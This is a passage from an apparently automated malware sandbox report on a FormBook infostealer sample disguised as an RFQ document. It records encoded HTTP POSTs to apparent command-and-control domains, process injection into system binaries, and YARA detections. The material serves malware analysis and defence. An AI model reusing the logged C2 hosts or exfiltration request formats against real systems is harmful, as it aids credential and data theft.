                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 1253
                                                                              Referer: http://www.snyp.shop/4nyz/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 77 51 6a 46 38 54 52 71 2f 44 43 6f 79 51 78 5a 67 79 59 68 55 49 4b 36 70 55 4d 7a 62 72 49 64 39 57 42 55 64 71 65 58 4a 62 47 48 38 64 68 50 33 4f 45 70 52 46 37 44 45 53 62 78 79 58 57 4a 66 76 5a 2b 4e 32 31 76 67 6d 5a 65 32 34 78 48 5a 66 70 4b 33 53 55 53 6c 36 56 59 4e 48 36 41 70 4b 6f 61 37 6f 37 57 44 38 72 74 69 4d 38 4d 2b 75 4a 4e 72 2f 6e 30 46 46 4f 6c 31 59 53 56 5a 69 75 33 32 57 32 2b 4e 66 2b 4e 31 57 7a 78 55 4a 39 33 78 63 68 49 72 6a 71 6c 44 74 46 53 55 44 47 49 44 35 68 5a 4f 45 4b 35 67 31 48 6b 33 6d 34 6e 34 45 65 4a 62 44 6b 4d 78 69 30 6d 41 30 30 32 39 77 39 46 6f 2b 74 37 77 78 35 43 55 48 4b 55 33 39 7a 70 6c 69 31 6c 57 57 30 74 2f 56 46 64 5a 4a 4f 34 6a 35 42 48 4b 4f 74 45 36 4f 51 50 2f 47 54 56 44 73 75 56 53 62 71 6f 43 33 64 6c 78 50 69 63 53 33 54 62 5a 65 6a 69 55 38 61 67 6d 41 65 2f 62 48 4f 64 4c 63 78 [TRUNCATED]
                                                                              Data Ascii: 6Pvh8TXP=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/wQjF8TRq/DCoyQxZgyYhUIK6pUMzbrId9WBUdqeXJbGH8dhP3OEpRF7DESbxyXWJfvZ+N21vgmZe24xHZfpK3SUSl6VYNH6ApKoa7o7WD8rtiM8M+uJNr/n0FFOl1YSVZiu32W2+Nf+N1WzxUJ93xchIrjqlDtFSUDGID5hZOEK5g1Hk3m4n4EeJbDkMxi0mA0029w9Fo+t7wx5CUHKU39zpli1lWW0t/VFdZJO4j5BHKOtE6OQP/GTVDsuVSbqoC3dlxPicS3TbZejiU8agmAe/bHOdLcxLaYVCe+t2+8WmTTWxkOLxC83/rm2nRrtlZ1R9j+uNpsVxU5alnFq82dJjBA0fz/yIxv1nd9MjDTQUa4xlSB4Azkf/40Cu+RYuIgLdIcngwNaOw6drWkg46g2TeuSBlMCQMUE9/Gl5BTANgUAm9Gagr5nBWzfEm2yAYIshqVoAfmrplGe/ZzPbrOD3vv0YKZdV9tE8J8UnCFj8jhuofazMutg2L5WoIGxwDq5loS/Nln+zcxHuoNHgUaDehbviPHQil0Xoml0A7V+zaUZ5Lkrhbpc+p/8KC1244di+MMZuMil8HWxRjL+2JVnrbMfczoimDZhSxl2vOgHJrl50JcUW0Ro2al7vhW9B24jwMZg31UyTzl44NZTom9hgmRTV9T3dazR1ZYHtYQjPtDhVZuBW8U4xVD7AmoUBcGlUu6jge31+X6R5VUIfcrZANc9BborUBTWvp3p0Xi/GV2GA6Zi3Yb6z+FgNnLg+reQI7UJEwf7edVr6py/g6XMuSKZVEBgv7bNOkMhAP5pMwijpTvnJybO/dCgS76cUgQXKYEhlF/TAp54ujgizgMHiKkEZibQvow2s1Z/U0c48q4eBJqJ9LC1fY+3hNDMdQ/4v9mxPOw2vYPjlNTjR27kJ4Mj9Iwwo833Yx2XW4N4pdjbe3sHz3YFuiUbDn6ZoQ [TRUNCATED]
                                                                              Dec 9, 2024 08:33:33.186393976 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.74983313.248.169.48805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:35.062782049 CET535OUTGET /4nyz/?6Pvh8TXP=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&9dfhu=10RxttPPB0 HTTP/1.1
                                                                              Host: www.snyp.shop
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Dec 9, 2024 08:33:36.030951023 CET402INHTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Mon, 09 Dec 2024 07:33:35 GMT
                                                                              content-length: 281
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 50 76 68 38 54 58 50 3d 62 63 4d 2f 4a 51 2f 45 46 77 46 57 59 51 67 74 54 4f 4f 53 33 35 72 71 6f 46 4d 64 76 69 65 67 54 4a 4b 6d 78 49 70 4a 6f 66 68 46 6b 79 4a 4d 52 70 54 55 47 74 43 39 31 5a 55 50 5a 52 4d 62 55 62 4e 4b 58 42 65 48 41 70 4e 73 41 58 4a 2b 4f 48 74 4c 66 41 56 67 6e 65 33 66 44 50 4e 5a 79 41 38 6a 66 57 71 32 64 61 37 55 54 34 35 71 30 66 77 31 62 38 53 58 38 48 31 65 2f 4c 6e 72 63 52 46 6c 58 39 6f 6d 32 68 52 6f 26 39 64 66 68 75 3d 31 30 52 78 74 74 50 50 42 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6Pvh8TXP=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&9dfhu=10RxttPPB0"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.749852156.251.17.224805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:41.707206964 CET797OUTPOST /u11p/ HTTP/1.1
                                                                              Host: www.duwixushx.xyz
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.duwixushx.xyz
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 221
                                                                              Referer: http://www.duwixushx.xyz/u11p/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 37 65 34 49 46 71 45 58 75 6f 38 74 37 78 31 34 42 56 69 54 62 50 56 34 38 6c 64 54 77 49 35 6f 49 4d 4f 70 62 78 54 50 77 77 47 51 4e 51 77 6e 45 30 46 68 64 4e 4f 66 41 6f 48 78 34 42 48 44 39 77 67 6c 6f 37 6d 61 35 70 64 30 6a 39 61 4a 55 46 42 6e 72 41 45 36 59 58 78 48 48 4e 54 35 32 54 76 32 41 41 74 6c 73 56 6e 39 5a 4f 74 38 77 58 5a 37 69 72 76 35 30 6c 64 31 67 70 4e 66 70 34 52 42 2b 71 36 2b 53 54 54 55 73 34 54 34 73 39 59 51 47 78 61 47 49 63 54 59 5a 56 79 34 71 53 55 4b 64 58 2b 53 71 52 61 4d 32 67 38 74 72 6f 62 72 62 63 4a 75 50 52 46 58 6a 66 55 52 64 75 4a 44 51 3d 3d
                                                                              Data Ascii: 6Pvh8TXP=pbJNUPA8iWSjp7e4IFqEXuo8t7x14BViTbPV48ldTwI5oIMOpbxTPwwGQNQwnE0FhdNOfAoHx4BHD9wglo7ma5pd0j9aJUFBnrAE6YXxHHNT52Tv2AAtlsVn9ZOt8wXZ7irv50ld1gpNfp4RB+q6+STTUs4T4s9YQGxaGIcTYZVy4qSUKdX+SqRaM2g8trobrbcJuPRFXjfURduJDQ==
                                                                              Dec 9, 2024 08:33:43.193639994 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:33:42 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.74985718.141.10.10780
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:42.533005953 CET358OUTPOST /gepvpveyhkiwwmj HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: vcddkls.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 874
                                                                              Dec 9, 2024 08:33:42.533005953 CET874OUTData Raw: 7e 07 39 31 d4 b8 57 8a 5e 03 00 00 fd b6 cf 3d 5e be 91 b8 cf 0f a7 69 1e 35 e7 1c 18 d5 dc ee 5e c7 0d fe 21 31 e9 2d 34 63 52 08 61 50 6b 49 96 c4 de fa 69 f3 1e f2 5d 28 e3 14 43 b3 fc b3 98 d9 79 d8 f6 14 ce 91 83 10 b9 04 ae 46 3e 5b d4 b7
                                                                              Data Ascii: ~91W^=^i5^!1-4cRaPkIi](CyF>[;S>P2x*}BsOmiia,=!RM w*`WoM*8/~-GWJea$?^&:Ha87\hE8
                                                                              Dec 9, 2024 08:33:44.568409920 CET411INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:33:44 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: btst=b6309c1ca69961f7e893b2e04967c17a|8.46.123.228|1733729624|1733729624|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                              Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              21192.168.2.749865156.251.17.22480
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:33:45.782782078 CET817OUTPOST /u11p/ HTTP/1.1
                                                                              Host: www.duwixushx.xyz
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.duwixushx.xyz
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 241
                                                                              Referer: http://www.duwixushx.xyz/u11p/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 70 62 4a 4e 55 50 41 38 69 57 53 6a 70 61 75 34 4f 6d 43 45 56 4f 6f 37 6a 62 78 31 79 68 56 6d 54 61 7a 56 34 39 52 30 54 69 38 35 6f 74 77 4f 6e 35 56 54 43 51 77 47 59 74 51 78 6f 6b 31 4a 68 64 49 78 66 46 6f 48 78 34 46 48 44 35 30 67 69 5a 37 6c 63 35 70 54 76 54 39 59 4e 55 46 42 6e 72 41 45 36 63 2b 35 48 48 56 54 35 48 6a 76 33 6a 5a 66 6b 73 56 6b 36 5a 4f 74 34 77 58 46 37 69 72 64 35 77 46 37 31 6d 74 4e 66 74 6f 52 43 76 71 37 77 53 54 56 4c 38 35 4e 77 65 4d 57 4b 32 5a 6a 48 71 55 62 62 4a 35 4d 39 63 54 32 51 2f 62 53 4d 37 70 68 49 30 45 4b 36 4e 31 75 70 61 59 52 6a 74 6c 6b 49 55 36 2b 63 50 50 4e 56 6e 45 77 41 77 70 36 49 47 66 47 4c 47 6b 65 68 66 41 2b 4b 76 41 3d
                                                                              Data Ascii: 6Pvh8TXP=pbJNUPA8iWSjpau4OmCEVOo7jbx1yhVmTazV49R0Ti85otwOn5VTCQwGYtQxok1JhdIxfFoHx4FHD50giZ7lc5pTvT9YNUFBnrAE6c+5HHVT5Hjv3jZfksVk6ZOt4wXF7ird5wF71mtNftoRCvq7wSTVL85NweMWK2ZjHqUbbJ5M9cT2Q/bSM7phI0EK6N1upaYRjtlkIU6+cPPNVnEwAwp6IGfGLGkehfA+KvA=
                                                                              Dec 9, 2024 08:33:47.284848928 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:33:47 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              Dec 9, 2024 08:33:47.907763004 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:33:47 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:02:31:36
                                                                              Start date:09/12/2024
                                                                              Path:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'801'728 bytes
                                                                              MD5 hash:DD6599C8B0D09A38D88EF2C1E1720A6C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:02:31:37
                                                                              Start date:09/12/2024
                                                                              Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'658'880 bytes
                                                                              MD5 hash:785A052E614E12F8A62CD368B4273290
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:02:31:37
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\System32\alg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\alg.exe
                                                                              Imagebase:0x140000000
                                                                              File size:1'594'368 bytes
                                                                              MD5 hash:5DBFDD947810E81DAFCE72FA7C481167
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:4
                                                                              Start time:02:31:39
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:138'056 bytes
                                                                              MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:5
                                                                              Start time:02:31:39
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:174'408 bytes
                                                                              MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:6
                                                                              Start time:02:31:39
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:154'952 bytes
                                                                              MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:7
                                                                              Start time:02:31:39
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\System32\AppVClient.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\AppVClient.exe
                                                                              Imagebase:0x140000000
                                                                              File size:1'348'608 bytes
                                                                              MD5 hash:1D7D22CFCA51F1A73A539A64CC53B616
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:02:31:40
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\System32\FXSSVC.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\fxssvc.exe
                                                                              Imagebase:0x140000000
                                                                              File size:1'242'624 bytes
                                                                              MD5 hash:2F8DCF43C75A2511D20EB9E59E43AB07
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:02:31:40
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
                                                                              Imagebase:0x860000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:02:31:42
                                                                              Start date:09/12/2024
                                                                              Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                              Imagebase:0x140000000
                                                                              File size:1'725'440 bytes
                                                                              MD5 hash:A46C8436F8D489B69D8BDDEB6C9361EB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:02:32:14
                                                                              Start date:09/12/2024
                                                                              Path:C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe"
                                                                              Imagebase:0x210000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:16
                                                                              Start time:02:32:16
                                                                              Start date:09/12/2024
                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                                              Imagebase:0xd0000
                                                                              File size:28'160 bytes
                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
